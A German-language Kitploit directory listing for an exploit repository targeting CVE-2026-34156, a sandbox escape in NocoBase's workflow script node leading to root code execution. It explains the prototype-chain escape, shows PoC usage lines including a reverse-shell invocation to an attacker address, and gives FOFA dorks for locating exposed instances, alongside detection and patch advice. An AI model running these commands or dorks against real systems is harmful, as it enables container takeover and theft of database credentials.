Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-34156 — CVE-2026-34156 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-34156
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHub0xblackash/cve-2026-34156

CVE-2026-34156

CVE-2026-34156

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2026-34156 - Kritische Sandbox-Escape in NocoBase

ChatGPT-Bild 3. April 2026, 13:32:16 Uhr Critical CVSS 9.9 Exploit Public

Nicht authentifiziert / Niedrige Berechtigungen → Root Remote Code Execution in NocoBase


📌 Übersicht

CVE-2026-34156 ist eine kritische Sandbox-Escape-Sicherheitslücke in NocoBase (einer Open-Source-No-Code/Low-Code-Plattform).

Ein Angreifer, der in der Lage ist, einen Workflow-Skript-Knoten zu erstellen oder auszuführen (selbst mit niedrigen Berechtigungen), kann die Node.js vm-Sandbox verlassen und eine vollständige Remote-Code-Ausführung als Root innerhalb des Containers erreichen.

Betroffene Versionen

  • NocoBase < 2.0.28

Behoben in

  • NocoBase 2.0.28 (veröffentlicht März 2026)

🛠 Schwachstellendetails

  • Komponente: @nocobase/plugin-workflow-javascript (Skript-Knoten)
  • Typ: Sandbox-Escape über console._stdout.constructor.constructor
  • Auswirkungen:
    • Remote-Code-Ausführung als Root (uid=0)
    • Beliebige Befehlsausführung
    • Dateisystemzugriff (fs)
    • Umgebungsvariablen-Leckage (Datenbank-Anmeldedaten, Geheimnisse)
    • Vollständige Container-Kompromittierung

Grundursache

Das in die Sandbox übergebene console-Objekt stammt aus dem Host-Bereich, was es Angreifern ermöglicht, die Prototypenkette zu erklimmen und auf den echten Function-Konstruktor → process.mainModule.require zuzugreifen.


🚀 Exploit

Proof of Concept (PoC)

root@kitploit:~
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"

# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444

Repository enthält: Vollständiges PoC-Skript, Nuclei-Vorlage und Sicherheitsprüfer.


🧪 Erkennung

Nuclei Template

root@kitploit:~
nuclei -u https://target -t cves/CVE-2026-34156.yaml

FOFA Dorks

root@kitploit:~
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"

🛡️ Gegenmaßnahmen

  1. Sofort auf NocoBase 2.0.28 oder neuer aktualisieren.
  2. Deaktivieren Sie den Workflow-Skript-Knoten für nicht vertrauenswürdige Benutzer.
  3. Führen Sie NocoBase-Container als Nicht-Root-Benutzer aus.
  4. Verwenden Sie stärkere Sandboxing (z. B. isolated-vm) in der Produktion.

📸 Bildschirmfotos

cve-2026-34156

⚠️ Rechtlicher Hinweis

Dieses Repository dient ausschließlich Ausbildungs- und autorisierten Sicherheitsforschungszwecken.
Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.

Unbefugte Ausnutzung ist illegal.


⭐ Danksagungen & Referenzen

  • Entdeckung: Unbekannt (öffentlich offengelegt)
  • Patch: NocoBase Sicherheitsteam
  • NVD: CVE-2026-34156
  • GitHub Advisory: GHSA-px3p-vgh9-m57c

Mit ❤️ für die Sicherheits-Community erstellt
Bleiben Sie sicher. Patchen Sie schnell.

Tool herunterladen